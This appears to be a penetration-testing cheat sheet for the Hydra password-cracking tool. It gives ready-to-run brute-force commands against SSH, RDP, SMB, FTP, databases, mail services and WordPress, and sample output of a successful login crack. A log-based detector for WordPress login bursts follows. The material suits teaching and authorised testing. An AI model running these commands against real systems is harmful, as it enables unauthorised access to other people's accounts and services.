Hydra

Password-cracking tool

It is a tool for cracking logins through brute-force or dictionary attacks.

Supports: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Parameter table

Parameter  Purpose
-P         Path to the password wordlist.
-L         Path to the username wordlist.
-t         Threads (1-64).
-s         Selects the service port when it is not the default.
-f         Exit once a valid login/password pair is found.
-vV        Verbose.

CouchDB

┌─[root@kali]─[/hydra]
└──╼ hydra -L /usr/share/wordlists/simple-users.txt -P /usr/share/wordlists/password.lst localhost -s 5984 http-get /

Docker Registry

┌─[root@kali]─[/hydra]
└──╼ hydra -L /usr/share/wordlists/simple-users.txt  -P /usr/share/wordlists/password.lst 10.1.1.30 -s 5000 https-get /v2/

Elasticsearch

┌─[root@kali]─[/hydra]
└──╼ hydra -L /usr/share/wordlists/simple-users.txt -P /usr/share/wordlists/password.lst localhost -s 9200 http-get /

FTP

┌─[root@kali]─[/hydra]
└──╼ hydra -l root -P passwords.txt -t 32 10.1.1.30 ftp

HTTP-GET

┌─[root@kali]─[/hydra]
└──╼ hydra -L username.txt -P /usr/share/wordlists/rockyou.txt 10.1.1.30 http-get /admin

For HTTPS, replace http-get with https-get.

HTTP-POST

┌─[root@kali]─[/hydra]
└──╼ hydra -L users.txt -P password.lst 10.1.1.30 http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V

For HTTPS, replace http-post-form with https-post-form.

IMAP

┌─[root@kali]─[/hydra]
└──╼ hydra -l USERNAME -P /path/to/passwords.txt -f 10.1.1.30 imap -V
┌─[root@kali]─[/hydra]
└──╼ hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f 10.1.1.30 imap -V

LDAP

┌─[root@kali]─[/hydra]
└──╼ hydra -L users.txt -P passwords.txt 10.1.1.30 ldap2 -V -f

MySQL

┌─[root@kali]─[/hydra]
└──╼ hydra -L usernames.txt -P pass.txt 10.1.1.30 mysql

POP3

┌─[root@kali]─[/hydra]
└──╼ hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.1.1.30 pop3 -V

PostgreSQL

┌─[root@kali]─[/hydra]
└──╼ hydra -L users.txt -P passwords.txt 10.1.1.30 postgres

RDP

┌─[root@kali]─[/hydra]
└──╼ hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.1.1.30
┌─[root@kali]─[/hydra]
└──╼ hydra -t 1 -V -f -L users.txt -P /usr/share/wordlists/rockyou.txt rdp://10.1.1.30

Redis

┌─[root@kali]─[/hydra]
└──╼ hydra -P passwords.txt redis://10.1.1.30:6379

Rexec

┌─[root@kali]─[/hydra]
└──╼ hydra -l user -P passwords.txt rexec://10.1.1.30 -v -V

Rlogin

┌─[root@kali]─[/hydra]
└──╼ hydra -l user -P passwords.txt rlogin://10.1.1.30 -v -V

Rsh

┌─[root@kali]─[/hydra]
└──╼ hydra -L user.txt rsh://10.1.1.30 -v -V

RTSP

┌─[root@kali]─[/hydra]
└──╼ hydra -l root -P passwords.txt 10.1.1.30 rtsp

SMB

┌─[root@kali]─[/hydra]
└──╼ hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt 10.1.1.30 smb
┌─[root@kali]─[/hydra]
└──╼ hydra -t 1 -V -f -L users.txt -P /usr/share/wordlists/rockyou.txt 10.1.1.30 smb

SMTP

┌─[root@kali]─[/hydra]
└──╼ hydra -P /usr/share/wordlists/wordlistsnmap.lst 10.1.1.30 smtp -V

SNMP

┌─[root@kali]─[/hydra]
└──╼ hydra -P wordlist.txt -v 10.1.1.30 snmp

SQL Server

┌─[root@kali]─[/hydra]
└──╼ hydra -L user.txt -P passwords.txt 10.1.1.30 mssql

SSH

┌─[root@kali]─[/hydra]
└──╼ hydra -vV -L users.txt -P passwords.txt -t 1 -u 10.1.1.30 ssh

When the username is known:

┌─[root@kali]─[/hydra]
└──╼ hydra -vV -l user -P passwords.txt -t 1 10.1.1.30 ssh

When the password is known:

┌─[root@kali]─[/hydra]
└──╼ hydra -vV -L users.txt -p password -t 1 -u 10.1.1.30 ssh

Telnet

┌─[root@kali]─[/hydra]
└──╼ hydra -l root -P passwords.txt -t 32 10.1.1.30 telnet

VNC

┌─[root@kali]─[/hydra]
└──╼ hydra -L users.txt -P passwords.txt -s 5432 10.1.1.30 vnc

Note

To remove duplicate entries from a wordlist, run the following:

┌─[root@kali]─[/hydra]
└──╼ cat wordlist.dic | sort | uniq > new_wordlist.txt

WordPress example

┌─[root@kali]─[/hydra]
└──╼ hydra -L users.txt -P passwords.txt 10.1.1.30 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 64
...
...
...
[ATTEMPT] target 10.1.1.30 - login "elliot" - pass "examples" - 5686 of 11452 [child 35] (0/0)
[ATTEMPT] target 10.1.1.30 - login "elliot" - pass "Examples" - 5687 of 11452 [child 50] (0/0)
[ATTEMPT] target 10.1.1.30 - login "elliot" - pass "exams" - 5688 of 11452 [child 8] (0/0)
[ATTEMPT] target 10.1.1.30 - login "elliot" - pass "excellent" - 5689 of 11452 [child 29] (0/0)
[80][http-post-form] host: 10.1.1.30   login: elliot   password: ER28-0652
1 of 1 target successfully completed, 1 valid password found
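
Seen from the server side, a run like the one above appears as a burst of POST requests to /wp-login.php from one address, ending in a redirect (the response the S=Location condition matches). The following detector is an added example, not part of the original page; the combined access-log format, the threshold and window values, the function names and the sample lines (documentation IP ranges) are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined access-log format; only client, time, method, path and status are used.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def detect_wp_login_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Per client IP: POST count to /wp-login.php, burst flag, redirect-after-burst flag.

    threshold and window are assumed tuning values. WordPress answers a failed
    login with 200 and a successful one with a 302 redirect.
    """
    posts = defaultdict(list)  # ip -> [(timestamp, status)]
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0] != "/wp-login.php":
            continue
        posts[m["ip"]].append((datetime.strptime(m["ts"], TS_FORMAT), int(m["status"])))
    report = {}
    for ip, events in posts.items():
        events.sort()
        burst_end, start = None, 0
        for i, (ts, _) in enumerate(events):
            while ts - events[start][0] > window:  # slide the window forward
                start += 1
            if i - start + 1 >= threshold:
                burst_end = i  # first event that completes a burst
                break
        redirect = burst_end is not None and any(s == 302 for _, s in events[burst_end:])
        report[ip] = {"attempts": len(events), "burst": burst_end is not None,
                      "redirect_after_burst": redirect}
    return report


def constructed_sample():
    """Constructed lines: 12 failed POSTs in 12 s then a 302 from one IP; one normal login."""
    base = datetime(2024, 1, 1, 12, 0, 0)
    fmt = '{} - - [{} +0000] "POST /wp-login.php HTTP/1.1" {} 512 "-" "-"'
    stamp = lambda i: (base + timedelta(seconds=i)).strftime("%d/%b/%Y:%H:%M:%S")
    lines = [fmt.format("192.0.2.10", stamp(i), 200 if i < 12 else 302) for i in range(13)]
    return lines + [fmt.format("198.51.100.7", stamp(0), 302)]
```

A source flagged with both `burst` and `redirect_after_burst` is the case that warrants an immediate password reset for the account, since the guessing ended in a successful login.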

Example from Windows

Hydra.exe is obtained from the THC-Hydra GitHub repository.

D:\Hydra>hydra.exe -v -V -t 64 -L users.txt -P rockyou.txt test.com https-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location"